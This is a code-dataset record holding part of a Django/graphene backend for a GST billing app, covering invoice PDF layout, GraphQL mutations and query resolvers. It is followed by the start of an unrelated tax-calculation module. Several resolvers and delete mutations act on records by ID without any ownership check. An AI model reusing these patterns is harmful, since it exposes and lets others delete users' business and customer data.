\"Batch\",1,0,\"C\")\n pdf.cell(40, 2*th, \"MFG.\",1,0,\"C\")\n \n # 315\n\n pdf.cell(20, 2*th, \"Qty\",1,0,\"C\")\n pdf.cell(40, 2*th, \"MRP\",1,0,\"C\")\n pdf.cell(40, 2*th, \"Dis%\",1,0,\"C\")\n pdf.cell(40, 2*th, \"SGST\",1,0,\"C\")\n pdf.cell(40, 2*th, \"CGST\",1,0,\"C\")\n pdf.cell(40, 2*th, \"Total\",1,0,\"C\")\n pdf.ln(2*th)\n\n for index,i in enumerate(products,start=1):\n\n\n \n pdf.set_font(\"Arial\", \"\", 8)\n pdf.cell(20, 2*th, str(index),1,0,\"C\")\n pdf.set_font(\"Arial\", \"B\", 8)\n pdf.cell(100, 2*th, str(i.product_name.upper()),1,0,\"C\")\n pdf.set_font(\"Arial\", \"\", 8)\n if(i.product.type_of_packing):\n pdf.cell(40, 2*th, str(i.product.type_of_packing),1,0,\"C\")\n else:\n pdf.cell(40, 2*th, str(\" - \"),1,0,\"C\")\n \n 
if(i.product.subcategory.hsn):\n pdf.cell(45, 2*th, str(i.product.subcategory.hsn),1,0,\"C\")\n else:\n pdf.cell(45, 2*th, str(\" - \"),1,0,\"C\")\n if(i.expiry_date):\n pdf.cell(30, 2*th, str(i.expiry_date.strftime(\"%m/%y\")),1,0,\"C\")\n else:\n pdf.cell(40, 2*th, str(\" - \"),1,0,\"C\")\n\n if(i.product.batch):\n pdf.cell(40, 2*th, str(i.product.batch),1,0,\"C\")\n else:\n pdf.cell(40, 2*th, str(\" - \"),1,0,\"C\")\n\n if(i.product.mfg):\n pdf.cell(40, 2*th, str(i.product.mfg),1,0,\"C\")\n else:\n pdf.cell(40, 2*th, str(\" - \"),1,0,\"C\")\n\n pdf.cell(20, 2*th, str(i.quantity),1,0,\"C\")\n pdf.cell(40, 2*th, str(i.price),1,0,\"C\")\n pdf.cell(40, 2*th, str(i.discount),1,0,\"C\")\n \n pdf.cell(40, 2*th, str(i.CGST),1,0,\"C\")\n pdf.cell(40, 2*th, str(i.SGST),1,0,\"C\")\n pdf.cell(40, 2*th, str(i.total),1,0,\"C\")\n pdf.ln(2*th)\n pdf.set_font(\"Arial\",\"\",12)\n pdf.cell(315,2*th,str(\"Payment Mode : {}\".format(bill.payment_mode)),0,0,\"C\")\n pdf.set_font(\"Arial\",\"\",10)\n pdf.cell(100,2*th,str(\"Gross Amount\"),1,0,\"C\")\n pdf.set_font(\"Arial\",\"B\",10)\n pdf.cell(120,2*th,str(bill.gross_amount ),1,0,\"C\")\n pdf.ln(2*th)\n \n pdf.set_font(\"Arial\",\"\",10)\n pdf.cell(315,2*th,str(\"\"),0,0,\"L\")\n pdf.cell(100,2*th,str(\"CGST\"),1,0,\"C\")\n pdf.set_font(\"Arial\",\"B\",10)\n pdf.cell(120,2*th,str(bill.cgst ),1,0,\"C\")\n pdf.ln(2*th)\n\n pdf.set_font(\"Arial\",\"\",10)\n pdf.cell(315,2*th,str(\"\"),0,0,\"L\")\n pdf.cell(100,2*th,str(\"SGST\"),1,0,\"C\")\n pdf.set_font(\"Arial\",\"B\",10)\n pdf.cell(120,2*th,str(bill.sgst ),1,0,\"C\")\n pdf.ln(2*th)\n\n pdf.set_font(\"Arial\",\"\",10)\n pdf.cell(315,2*th,str(\"\"),0,0,\"L\")\n pdf.cell(100,2*th,str(\"Net Amount\"),1,0,\"C\")\n pdf.set_font(\"Arial\",\"B\",10)\n pdf.cell(120,2*th,str(bill.net_amount ),1,0,\"C\")\n pdf.ln(2*th)\n\n\n # pdf.cell(220,2*th,str(\"Gross Amount\"))\n pdf.output(\"{}.pdf\".format(bill.invoice_number))\n\n\n\ndef GenerateBill(gross,invoice_number,medicines,discount,cgst,total,bill,user):\n # print(\"invoice ...\")\n # print(invoice_number)\n template = get_template(\"x.html\")\n context = {\"gross\":gross,\"medicines\": medicines,\"discount\":discount,\"cgst\":cgst,\"sgst\":cgst,\"total\":total,\"invoice\":invoice_number,\"bill\":bill,\"user\":user}\n html = template.render(context)\n options = {\n 'page-size': 'A4',\n 'margin-top': '50px',\n 'margin-right': '50px',\n 'margin-bottom': '50px',\n 'margin-left': '50px',\n # 'orientation':'landscape'\n }\n\n\n\n\n pdfkit.from_string(html, '{}.pdf'.format(invoice_number),options=options)\n \n\n\n\n\nclass CreateBill(graphene.Mutation):\n class Arguments:\n # name = graphene.String(required = True)\n # age = graphene.String(required = True)\n # gender = graphene.String(required = True)\n customerId = graphene.ID(required = True)\n remarks = graphene.String(required = True)\n # productId = graphene.ID(required = True)\n payment_mode = graphene.String(required = True)\n billing_date = graphene.String(required = True)\n invoice_number = graphene.String(required = True)\n is_instant = graphene.Boolean(required = True)\n # taga = gra\n # payment = graphene.Float(required=True)\n # gst = graphene.Float(required = True)\n products = graphene.List(MInput)\n bill = graphene.Field(BillingNode)\n ledger = graphene.Field(LedgerNode)\n def mutate(self,info,payment_mode,billing_date,products,customerId,remarks,invoice_number,is_instant):\n # print(products[0])\n # user_id = from_global_id(user_id)[1]\n # name = name.replace(\" ({})\".format(age),\"\")\n\n # customer = 
Customer.objects.filter(name__iexact=name,age=12,sex=gender)\n # if customer:\n # user_id = customer[0]\n # else:\n # user_id = Customer.objects.create(name=name,age=age,sex=gender)\n\n user_id = from_global_id(customerId)[1]\n\n # inv_no = \n bill = Billing.objects.create( \n is_instant=is_instant, user_id=info.context.user.id, customer_id=user_id,payment_mode=payment_mode,billing_date=datetime.datetime.strptime(billing_date,\"%Y-%m-%d\")\n )\n # print(bill)\n if(is_instant):\n temp_bill = Billing.objects.filter(user_id = info.context.user.id).exclude(is_instant=False).exclude(id=bill.id)\n print(temp_bill)\n # Billing.objects.filter(user_id=1).exclude(is_instant=False) \n if(temp_bill):\n print(temp_bill)\n # print(temp_bill.order_by(\"-id\")[0].invoice_number_instant)\n # for i in temp_bill.order_by(\"-id\"):\n # print(i.invoice_number_instant)\n \n if(temp_bill.order_by(\"-id\")[0].invoice_number_instant):\n print(temp_bill.order_by(\"-id\")[0].invoice_number_instant)\n bill.invoice_number_instant = int(temp_bill.order_by(\"-id\")[0].invoice_number_instant) + 1\n else:\n bill.invoice_number_instant = 1\n else:\n bill.invoice_number_instant = 1\n\n else:\n bill.invoice_number = invoice_number\n\n gross = total = discount = cgst = 0.0\n\n for i in products:\n gross += i[\"price\"] * i[\"net\"]\n total += (i[\"price\"] * i[\"net\"]) #- (i[\"price\"]*i[\"qty\"] * i[\"discount\"]/100)\n # discount += i[\"price\"]*i[\"qty\"] * i[\"discount\"]/100\n cgst += i[\"price\"]*i[\"net\"] * 10 /100\n\n print(i)\n Sales_Product.objects.create(\n taga = i[\"taga\"],\n product_id = from_global_id(i[\"product_id\"])[1],\n product_name = i[\"name\"],\n lessm = float(i[\"less\"]),\n price = round(float(i[\"price\"]),2),\n # discount = round(float(i[\"discount\"])),\n grossm = float(i[\"grossm\"]),\n netm = float(i[\"net\"]),\n # expiry_date = datetime.datetime.strptime(i[\"expiry\"],\"%Y-%m-%d\"),\n CGST = round(float(i[\"price\"]) * float(i[\"net\"]) * float(10)/100/2,2),\n SGST = round(float(i[\"price\"]) * float(i[\"net\"]) * float(10)/100/2,2),\n total = round(float(i[\"net\"]) * float(i[\"price\"]),2), # - (i[\"price\"]*i[\"netm\"]*i[\"discount\"]/100),2),\n billing_id = bill.id,\n )\n # bill = Billing.objects.get(id=14)\n # print(gross)\n # print(discount)\n # print(cgst)\n # print(total)\n \n bill.gross_amount = round(gross,2)\n bill.discount =round(discount,2)\n bill.cgst = round(cgst/2,2)\n bill.sgst = round(cgst/2,2)\n bill.net_amount = round(total,2)\n # bill.save() \n \n # ParitalPayment.objects.create(paid=payment,outstanding=total-payment,bill_id = bill.id)\n\n # GenerateBill(gross,bill.invoice_number,Medicine.objects.filter(billing_id=bill.id),discount,cgst,total,bill,info.context.user)\n # generate_receipt(bill,Sales_Product.objects.filter(billing_id=bill.id),info.context.user)\n # pdfname = \"{}.pdf\".format(bill.invoice_number)\n # print(pdfname)\n # with open(pdfname,'rb') as pdf:\n # bill.invoice.save(pdfname,File(pdf),save=True)\n led = Ledgers.objects.create(sale_id = bill.id,user_id = info.context.user.id)\n bill.save()\n # ParitalPayment.objects.create(paid=payment,outstanding=total-payment,bill_id = bill.id)\n # os.remove(pdfname)\n return CreateBill(bill=bill,ledger=led)\n\n\n\nclass UpdatePersonal(graphene.Mutation):\n class Arguments:\n firstname = graphene.String(required=True)\n lastname = graphene.String(required=True)\n phone = graphene.String(required=True)\n email = graphene.String(required=True)\n user = graphene.Field(UserNode)\n def 
mutate(self,info,firstname,lastname,phone,email):\n userid = info.context.user.id\n user = User.objects.get(id=userid)\n user.first_name = firstname\n user.last_name = lastname\n user.email = email\n user.save()\n\n profile = Profile.objects.get(user_id = userid)\n profile.contact_number = phone\n profile.save()\n return UpdatePersonal(user=user)\n\nclass UpdateFirm(graphene.Mutation):\n class Arguments:\n firm_name = graphene.String(required=True)\n gst = graphene.String(required=True)\n # tin = graphene.String(required=True)\n user = graphene.Field(UserNode)\n def mutate(self,info,firm_name,gst):\n userid = info.context.user.id\n user = User.objects.get(id=userid)\n profile = Profile.objects.get(user_id = userid)\n profile.GST_no = gst\n # profile.TIN_no = tin\n profile.firm_name = firm_name\n profile.save()\n return UpdateFirm(user=user)\n\nclass UpdateAddress(graphene.Mutation):\n class Arguments:\n address = graphene.String(required=True)\n state = graphene.String(required=True)\n city = graphene.String(required=True)\n zipcode = graphene.String(required=True)\n user = graphene.Field(UserNode)\n def mutate(self,info,address,state,city,zipcode):\n userid = info.context.user.id\n user = User.objects.get(id=userid)\n profile = Profile.objects.get(user_id = userid)\n profile.address = address\n # profile.contact_number = phone\n profile.state = state\n profile.city = city\n profile.zipcode = zipcode\n profile.save()\n return UpdateAddress(user=user)\n\nclass UpdateBank(graphene.Mutation):\n class Arguments:\n account = graphene.String(required=True)\n # bank = graphene.String(required=True)\n name = graphene.String(required=True)\n bank_name = graphene.String(required=True)\n branch = graphene.String(required=True)\n ifsc_code = graphene.String(required=True)\n user = graphene.Field(UserNode)\n def mutate(self,info,account,name,bank_name,branch,ifsc_code):\n bank = Bank.objects.get(user_id = info.context.user.id)\n bank.account_no = account\n bank.name = name\n bank.branch = branch\n bank.bank_name = bank_name\n bank.ifsc_code = ifsc_code\n bank.save()\n return UpdateBank(user = info.context.user)\n\n\n\n\nclass UpdateUser(graphene.Mutation):\n class Arguments:\n gst = graphene.String(required=True)\n # tin = graphene.String(required=True)\n firm_name = graphene.String(required=True)\n address = graphene.String(required=True)\n state = graphene.String(required=True)\n city = graphene.String(required=True)\n zipcode = graphene.String(required=True)\n email = graphene.String(required=True)\n firstname = graphene.String(required=True)\n lastname = graphene.String(required=True)\n phone = graphene.String(required=True)\n \n user = graphene.Field(UserNode)\n def mutate(self,info,gst,firm_name,address,email,firstname,lastname,phone,state,city,zipcode):\n userid = info.context.user.id\n user = User.objects.get(id = userid)\n user.first_name = firstname\n user.last_name = lastname\n user.email = email\n user.save()\n \n profile = Profile.objects.get(user_id = userid)\n profile.GST_no = gst\n # profile.TIN_no = tin\n profile.address = address\n profile.contact_number = phone\n profile.state = state\n profile.city = city\n profile.zipcode = zipcode\n profile.save()\n return UpdateUser(user = user)\n\nclass UpdateCategory(graphene.Mutation):\n class Arguments:\n category = graphene.String(required=True)\n subcategory = graphene.String(required=True)\n gst = graphene.Float(required=True)\n hsn = graphene.String(required=True)\n\n isNew = graphene.Boolean()\n category = graphene.Field(CategoryNode)\n 
sub_category = graphene.Field(SubCategoryNode)\n def mutate(self,info,category,subcategory,gst,hsn):\n cat = Category.objects.filter(name__iexact=category)\n if(cat):\n cat = cat[0]\n sub = SubCategory.objects.filter(name__iexact=subcategory)\n if(sub):\n sub = sub[0]\n # print(sub.hsn)\n sub.hsn = hsn\n sub.GST = gst\n sub.save()\n return UpdateCategory(isNew = False,category = cat,sub_category=sub)\n else:\n sub = SubCategory.objects.create(name=subcategory,hsn=hsn,GST=gst,user_id=info.context.user.id,category_id=cat.id)\n return UpdateCategory(isNew = True,category=cat,sub_category=sub)\n # else:\n cat = Category.objects.create(name=category,user_id=info.context.user.id)\n sub = SubCategory.objects.create(name=subcategory,hsn=hsn,GST=gst,user_id=info.context.user.id,category_id=cat.id)\n return UpdateCategory(isNew = True,category=cat,sub_category=sub)\n\nclass DeleteSubCategory(graphene.Mutation):\n class Arguments:\n id = graphene.ID(required=True)\n success=graphene.Boolean()\n def mutate(self,info,id):\n SubCategory.objects.get(id=from_global_id(id)[1]).delete()\n return DeleteSubCategory(success=True)\n\nclass UpdateSubCategory(graphene.Mutation):\n class Arguments:\n id = graphene.String(required=False)\n category = graphene.String(required=False)\n is_update = graphene.Boolean(required=True) \n hsn = graphene.String(required=True)\n gst = graphene.Int(required=True)\n name = graphene.String(required=True)\n success = graphene.Boolean()\n sub_category = graphene.Field(SubCategoryNode)\n\n def mutate(self,info,is_update,hsn,gst,name,id=None,category=None):\n if(is_update is False):\n sub = SubCategory.objects.create(name=name,GST=gst,hsn=hsn,user_id=info.context.user.id,category_id=from_global_id(category)[1])\n return UpdateSubCategory(sub_category=sub,success=True)\n else:\n sub = SubCategory.objects.get(id=from_global_id(id)[1])\n sub.name = name\n sub.GST = gst\n sub.hsn = hsn\n sub.save()\n return UpdateSubCategory(sub_category=sub,success=True)\n\n\nclass RenameCategory(graphene.Mutation):\n class Arguments:\n id = graphene.ID(required=True)\n name = graphene.String(required=False)\n is_update = graphene.Boolean(required=True)\n\n success = graphene.Boolean()\n category = graphene.Field(CategoryNode)\n\n def mutate(self,info,id,is_update,name=None):\n if(is_update is True):\n c = Category.objects.get(id=from_global_id(id)[1])\n c.name = name\n c.save()\n return RenameCategory(success=True,category=c)\n else:\n Category.objects.get(id=from_global_id(id)[1]).delete()\n return RenameCategory(success=True)\nclass CreateVendor(graphene.Mutation):\n class Arguments:\n id = graphene.String(required=True)\n name = graphene.String(required=True)\n mobile = graphene.String(required=True)\n gst = graphene.String(required=True)\n address = graphene.String(required=True)\n city = graphene.String(required=True)\n state = graphene.String(required=True)\n zipcode = graphene.String(required=True)\n company = graphene.String(required=True)\n email = graphene.String(required=True)\n is_new = graphene.Boolean(required=True)\n\n vendor = graphene.Field(VendorNode)\n def mutate(self,info,id,name,mobile,gst,address,city,state,zipcode,company,email,is_new):\n if(is_new is True):\n vendor = Vendor.objects.create(name=name,mobile=mobile,email=email, gst=gst,address=address ,state_id=from_global_id(state)[1],city_id=from_global_id(city)[1],zip_code=zipcode,company=company,user_id=info.context.user.id)\n else:\n vendor = Vendor.objects.get(id = from_global_id(id)[1])\n vendor.name = name\n vendor.mobile 
= mobile\n vendor.email = email\n vendor.gst = gst\n vendor.address = address\n vendor.state_id = from_global_id(state)[1]\n vendor.city_id = from_global_id(city)[1]\n vendor.zip_code = zipcode\n vendor.company = company\n vendor.save()\n return CreateVendor(vendor = vendor)\n\n\n\nclass CreateCustomer(graphene.Mutation):\n class Arguments:\n id = graphene.String(required=True)\n name = graphene.String(required=True)\n mobile = graphene.String(required=True)\n gst = graphene.String(required=True)\n address = graphene.String(required=True)\n state = graphene.String(required=True)\n city = graphene.String(required=True)\n addhar = graphene.String(required=True)\n email = graphene.String(required=True)\n is_new = graphene.Boolean(required=True)\n zipcode = graphene.String(required=True)\n company = graphene.String(required=True)\n customer = graphene.Field(CustomerNode)\n def mutate(self,info,id,name,mobile,gst,address,email,is_new,state,city,addhar,zipcode,company):\n if(is_new is True):\n customer = Customer.objects.create(name=name,city=city,state=state,addhar_no=addhar ,mobile=mobile,gst_number=gst,address=address,email=email,user_id = info.context.user.id,company=company,zipcode=zipcode)\n # return CreateCustomer(customer = customer)\n else:\n customer = Customer.objects.get(id = from_global_id(id)[1])\n customer.name = name\n customer.mobile = mobile\n customer.gst_number = gst\n customer.email = email\n customer.address = address\n customer.city = city\n customer.state = state\n customer.addhar_no = addhar\n customer.zipcode = zipcode\n customer.company = company\n customer.save()\n return CreateCustomer(customer = customer)\n\n\n\nclass CreateCategory(graphene.Mutation):\n class Arguments:\n name = graphene.String(required=True)\n category = graphene.Field(CategoryNode)\n def mutate(self,info,name):\n print(info.context.user.id)\n category = Category.objects.create(name=name,user_id = info.context.user.id)\n return CreateCategory(category = category)\n\nclass DeleteCustomer(graphene.Mutation):\n class Arguments:\n id = graphene.String(required=True)\n success = graphene.Boolean()\n def mutate(self,info,id):\n Customer.objects.get(id=from_global_id(id)[1]).delete()\n return DeleteCustomer(success=True)\n\nclass DeleteVendor(graphene.Mutation):\n class Arguments:\n id = graphene.String(required=True)\n success = graphene.Boolean()\n def mutate(self,info,id):\n Vendor.objects.get(id=from_global_id(id)[1]).delete()\n return DeleteVendor(success=True)\n\nclass DeleteProduct(graphene.Mutation):\n class Arguments:\n id = graphene.String(required=True)\n success = graphene.Boolean()\n def mutate(self,info,id):\n Product.objects.get(id=from_global_id(id)[1]).delete()\n return DeleteProduct(success = True)\n\nclass AddPurchasePayment(graphene.Mutation):\n class Arguments:\n paid = graphene.Float(required=True)\n vendor_id = graphene.ID(required=True)\n date = graphene.String(required=True)\n outstanding = graphene.Float(required=True)\n mode = graphene.String(required=True)\n success = graphene.Boolean()\n partial = graphene.Field(PartialPaymentNode)\n def mutate(self,info,paid,vendor_id,date,outstanding,mode):\n p = ParitalPayment.objects.create(mode=mode, vendor_id = from_global_id(vendor_id)[1],date = datetime.datetime.strptime(date,\"%Y-%m-%d\"),paid=paid,outstanding=outstanding,user_id = info.context.user.id)\n # p = ParitalPayment.objects.all()[::-1][0]\n return AddPurchasePayment(success=True,partial = p)\n\nclass AddCustomerOutStanding(graphene.Mutation):\n class Arguments:\n 
outstanding = graphene.Float()\n customer_id = graphene.ID(required=True)\n customer = graphene.Field(CustomerNode)\n def mutate(self,info,outstanding,customer_id):\n c = Customer.objects.get(id=from_global_id(customer_id)[1])\n c.outstanding_add = 1\n out = CSales.objects.filter(customer_id = from_global_id(customer_id)[1])\n # print(out)\n if(out):\n # print()\n out[0].sales = outstanding + out[0].sales if out[0].sales else outstanding\n out[0].save()\n else:\n CSales.objects.create(customer_id = from_global_id(customer_id)[1],sales = outstanding,user_id=info.context.user.id)\n c.save()\n return AddCustomerOutStanding(customer = c)\n \n\nclass AddVendorOutStanding(graphene.Mutation):\n class Arguments:\n outstanding = graphene.Float()\n vendor_id = graphene.ID(required=True)\n vendor = graphene.Field(VendorNode)\n def mutate(self,info,outstanding,vendor_id):\n c = Vendor.objects.get(id=from_global_id(vendor_id)[1])\n c.outstanding_add = 1\n out = VPurchase.objects.filter(vendor_id = from_global_id(vendor_id)[1])\n # print(out)\n if(out):\n # print()\n out[0].purchase = outstanding + out[0].purchase if out[0].purchase else outstanding\n out[0].save()\n else:\n VPurchase.objects.create(vendor_id = from_global_id(vendor_id)[1],purchase = outstanding,user_id=info.context.user.id)\n c.save()\n return AddVendorOutStanding(vendor = c) \n\nclass AddSalesPayment(graphene.Mutation):\n class Arguments:\n paid = graphene.Float(required=True)\n customer_id = graphene.ID(required=True)\n date = graphene.String(required=True)\n outstanding = graphene.Float(required=True)\n mode = graphene.String(required=True)\n success = graphene.Boolean()\n partial = graphene.Field(PartialPaymentNode)\n def mutate(self,info,paid,customer_id,date,outstanding,mode):\n p = ParitalPayment.objects.create(user_id=info.context.user.id, mode=mode,customer_id = from_global_id(customer_id)[1],date = datetime.datetime.strptime(date,\"%Y-%m-%d\"),paid=paid,outstanding=outstanding)\n # p = ParitalPayment.objects.all()[::-1][0]\n return AddSalesPayment(success=True,partial = p)\n\nclass CreateUser(graphene.Mutation):\n # user = graphene.Field(UserNode)\n class Arguments:\n username = graphene.String(required=True)\n password = graphene.String(required=True)\n email = graphene.String(required=True)\n firstname = graphene.String(required=True)\n lastname = graphene.String(required=True)\n phone = graphene.String(required=True)\n\n gst = graphene.String(required=True)\n # tin = graphene.String(required=True)\n firm_name = graphene.String(required=True)\n address = graphene.String(required=True)\n\n user = graphene.Field(UserNode)\n def mutate(self,info,username,password,email,firstname,lastname,gst,firm_name,address,phone):\n user = get_user_model()(username = username,email = email,first_name = firstname,last_name=lastname)\n user.set_password(password)\n user.save()\n Profile.objects.create(user_id = user.id,GST_no = gst,firm_name=firm_name,address=address,contact_number=phone)\n Bank.objects.create(user_id = user.id)\n return CreateUser(user=user)\n\nimport graphql_jwt\n\nclass Mutation(graphene.ObjectType):\n create_user = CreateUser.Field()\n create_product = CreateProduct.Field()\n delete_product = DeleteProduct.Field()\n delete_customer = DeleteCustomer.Field()\n delete_vendor = DeleteVendor.Field()\n generate_bill = CreateBill.Field()\n update_bank = UpdateBank.Field()\n update_user = UpdateUser.Field()\n update_address = UpdateAddress.Field()\n update_firm = UpdateFirm.Field()\n update_personal = UpdatePersonal.Field()\n # 
create_user = CreateUser.Field()\n update_category = UpdateCategory.Field()\n rename_category = RenameCategory.Field()\n token_auth = graphql_jwt.ObtainJSONWebToken.Field()\n update_subcategory = UpdateSubCategory.Field()\n delete_subcategory = DeleteSubCategory.Field()\n create_category = CreateCategory.Field()\n create_customer = CreateCustomer.Field()\n create_vendor = CreateVendor.Field()\n add_purchase = AddPurchase.Field()\n add_sales_payment = AddSalesPayment.Field()\n add_purchase_payment = AddPurchasePayment.Field()\n add_customer_out_standing = AddCustomerOutStanding.Field()\n add_vendor_out_standing = AddVendorOutStanding.Field()\n \n\nclass Query(graphene.AbstractType):\n customers = DjangoFilterConnectionField(CustomerNode,search=graphene.String())\n customers_by_company = DjangoFilterConnectionField(CSalesNode,search=graphene.String())\n vendor_by_company = DjangoFilterConnectionField(VPurchaseNode,search=graphene.String())\n customer = graphene.Field(CustomerNode,id=graphene.ID())\n vendor = graphene.Field(VendorNode,id=graphene.ID())\n all_products = DjangoFilterConnectionField(ProductNode,search=graphene.String())\n product_by_id = graphene.Field(ProductNode,id=graphene.ID())\n product_suggestion = graphene.List(ProductNode,suggestion=graphene.String())\n category_suggestion = graphene.List(CategoryNode,suggestion=graphene.String())\n report = DjangoFilterConnectionField(BillingNode,min=graphene.String(),max=graphene.String())\n history = DjangoFilterConnectionField(BillingNode,slug=graphene.String(),is_instant=graphene.Boolean())\n subcategoy = DjangoFilterConnectionField(SubCategoryNode,id = graphene.ID(),search=graphene.String())\n user = graphene.Field(UserNode)\n customer_suggestion = DjangoFilterConnectionField(CustomerNode,suggestion = graphene.String())\n\n categories = DjangoFilterConnectionField(CategoryNode,search=graphene.String())\n vendors = DjangoFilterConnectionField(VendorNode,search=graphene.String())\n vendors_search = DjangoFilterConnectionField(VendorNode,search=graphene.String())\n states = DjangoFilterConnectionField(StateNode)\n city = DjangoFilterConnectionField(CityNode,stateId = graphene.ID())\n purchases = DjangoFilterConnectionField(PurchaseNode,slug=graphene.String())\n purchaseProduct = DjangoFilterConnectionField(PurchaseProductNode,purchaseId=graphene.ID())\n dashboard = graphene.Field(Dashboard)\n last_number = graphene.Field(InvoiceNumber,id=graphene.String())\n ledgers = DjangoFilterConnectionField(LedgerNode,search=graphene.String())\n bank_by_customer = DjangoFilterConnectionField(CustomerNode,search=graphene.String())\n all_payment = DjangoFilterConnectionField(PartialPaymentNode,search=graphene.String())\n # invoiceNumner = graphene\n # bank_by_vendor = DjangoFilterConnectionField(VendorNode,search=graphene.String())\n # ledgers = graphene.\n\n# 9899200257\n\n\n def resolve_all_payment(self,info,search,**kwargs):\n return ParitalPayment.objects.filter(Q(vendor__company__icontains=search) | Q(customer__company__icontains=search)).filter(user_id = info.context.user.id).order_by(\"-id\")\n\n def resolve_bank_by_customer(self,info,search,**kwargs):\n return Customer.objects.all()\n\n\n def resolve_ledgers(self,info,search,**kwargs):\n\n # return Ledgers.objects.filter(user_id=info.context.user.id).order_by(\"-id\")\n return Ledgers.objects.filter(Q(sale__customer__company__icontains=search) |Q(purchase__vendor__company__icontains=search) | Q(sale__invoice_number__icontains=search) |Q(purchase__invoice_number__icontains=search) | 
Q(sale__net_amount__icontains=search) |Q(purchase__total_bill__icontains=search)).order_by(\"-id\")\n \n def resolve_last_number(self,info,id):\n print(id)\n if(id):\n if(Billing.objects.filter(invoice_number=id).filter(user_id=info.context.user.id)).filter(is_instant=False):\n return {\"exist\":True,\"last_number\":0}\n else:\n return {\"exist\":False,\"last_number\":0}\n else:\n bill = Billing.objects.filter(user_id=info.context.user.id).filter(is_instant=False)\n if(bill):\n \n # num = int(bill[::-1][0].invoice_number) + 1\n num = int(bill.order_by(\"-id\")[0].invoice_number) + 1\n\n return {\"last_number\":num,\"exist\":False}\n else:\n return {\"last_number\":1,\"exist\":False}\n\n\n def resolve_dashboard(self,info):\n sales=0\n \n for i in Billing.objects.filter(user_id=info.context.user.id):\n sales=sales+i.net_amount\n purchase = 0\n for i in Purchase.objects.filter(user_id=info.context.user.id):\n purchase += i.total_bill if i.total_bill else 0\n \n return {\"sales\":sales,\"purchase\":purchase}\n\n def resolve_vendors_search(self,info,search,**kwargs):\n \n data = Vendor.objects.filter(Q(name__icontains=search) | Q(company__icontains=search) | Q(email__icontains=search) | Q(city__name__icontains=search) | Q(state__name__icontains=search) | Q(mobile__icontains=search)).filter(user=info.context.user.id)\n return data\n # print(data)\n # return Vendor.objects.all()\n\n def resolve_purchaseProduct(self,info,purchaseId,**kwargs):\n return PurchaseProduct.objects.filter(purchase__id = from_global_id(purchaseId)[1])\n\n\n def resolve_city(self,info,stateId):\n return City.objects.filter(state_id=from_global_id(stateId)[1])\n\n def resolve_vendors(self,info,search,**kwargs):\n return Vendor.objects.filter(Q(name__icontains=search) | Q(company__icontains=search) | Q(email__icontains=search) | Q(city__name__icontains=search) | Q(state__name__icontains=search) | Q(mobile__icontains=search)).filter(user_id=info.context.user.id)\n # return Vendor.objects.filter(user_id = info.context.user.id)\n\n def resolve_customer(self,info,id):\n return Customer.objects.get(id=from_global_id(id)[1])\n \n def resolve_vendor(self,info,id):\n return Vendor.objects.get(id=from_global_id(id)[1])\n\n def resolve_customers(self,info,search,**kwargs):\n return Customer.objects.filter(Q(name__icontains=search) | Q(email__icontains=search) | Q(mobile__icontains=search) | Q(gst_number__icontains=search) | Q(address__icontains=search)).filter(user_id=info.context.user.id)\n\n def resolve_vendor_by_company(self,info,search,**kwargs):\n return VPurchase.objects.filter(vendor__company__icontains=search).filter(user_id=info.context.user.id)\n\n def resolve_customers_by_company(self,info,search,**kwargs):\n return CSales.objects.filter(customer__company__icontains=search).filter(user_id=info.context.user.id)\n\n # return Customer.objects.filter(Q(name__icontains=search) | Q(company__icontains=search) ).filter(user_id=info.context.user.id).filter(outstanding_add=False)\n\n\n\n def resolve_customer_suggestion(self,info,suggestion,**kwargs):\n return Customer.objects.filter(company__icontains=suggestion).filter(user_id=info.context.user.id)\n # def resolve_customers(self,info):\n # return Customer.objects.filter(user_id=info.context.user.id)\n\n def resolve_subcategoy(self,info,id,search,**kwargs):\n return SubCategory.objects.filter(category_id=from_global_id(id)[1]).filter(Q(name__icontains=search))\n \n\n def resolve_user(self,info):\n # print(\"..user..\")\n # user_id = info.context.user.id\n print(info.context.user)\n 
return User.objects.get(id = info.context.user.id)\n\n # def resol\n\n # def resolve_history(self,info,*args):\n # return Billing.objects.all()\n def resolve_history(self,info,slug,is_instant,**kwargs):\n if(not len(slug)):\n return Billing.objects.filter(is_instant=is_instant)\n\n if(Billing.objects.filter(invoice_number__iexact=slug).filter(is_instant=is_instant)):\n return Billing.objects.filter(invoice_number__iexact=slug).filter(is_instant=is_instant)\n \n return Billing.objects.filter(customer__name__iexact=slug).filter(is_instant=is_instant)\n \n def resolve_purchases(self,info,slug,**kwargs):\n if(not len(slug)):\n return Purchase.objects.all().order_by(\"-id\")\n\n if(Purchase.objects.filter(invoice_number__iexact=slug)):\n return Purchase.objects.filter(invoice_number__iexact=slug).order_by(\"-id\")\n \n return Purchase.objects.filter(vendor__name__iexact=slug).order_by(\"-id\")\n\n \n # else if(Billing.objects.filter(patient__name__iexact=\"aman\"))\n\n def resolve_categories(self,info,search,**kwargs):\n \n # return Category.objects.filter(user_id = info.context.user.id)\n return Category.objects.filter(Q(name__icontains=search)).filter(user_id=info.context.user.id)\n\n def resolve_report(self,info,min,max):\n return Billing.objects.filter(billing_date__range=[min,max]).order_by('-id')\n\n def resolve_category_suggestion(self,info,suggestion):\n return Category.objects.filter(name__icontains=suggestion)\n def resolve_product_suggestion(self,info,suggestion):\n # return Product.objects.all()\n return Product.objects.filter(name__icontains=suggestion).filter(user_id=info.context.user.id)\n\n def resolve_all_products(self,info,search,**kwargs):\n # print(info.context.user)\n\n return Product.objects.filter(Q(name__icontains=search) | Q(mfg__icontains=search) | Q(mrp__icontains=search) | Q(price__icontains=search)).filter(user_id=info.context.user.id)\n\n # return Product.objects.all()\n \n def resolve_product_by_id(self,info,id):\n print(from_global_id(id)[1])\n return Product.objects.get(id=from_global_id(id)[1])\n \n def resolve_all_customer(self,info,**kwargs):\n return Customer.objects.all()\n","repo_name":"nixistechnologies/BACARDI","sub_path":"backend/app/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":50713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39677250475","text":"import numpy as np\nfrom srd import federal, oas, quebec, ontario, payroll, assistance, covid, ei, Person, Hhold, Dependent\nfrom itertools import product\nimport pandas as pd\nfrom multiprocessing import cpu_count, Pool\n\n\nclass tax:\n \"\"\"\n Classe générale pour le calcul des impôts, cotisations et prestations.\n\n Parameters\n ----------\n year: int\n année pour le calcul\n ifed: boolean\n vrai si le calcul de l'impôt fédéral est demandé\n ioas: boolean\n vrai si le calcul des prestations de PSV, SRG, Allocation et Allocation au survivant est demandé\n iprov: boolean\n vrai si le calcul de l'impôt provincial est demandé\n ipayroll: boolean\n 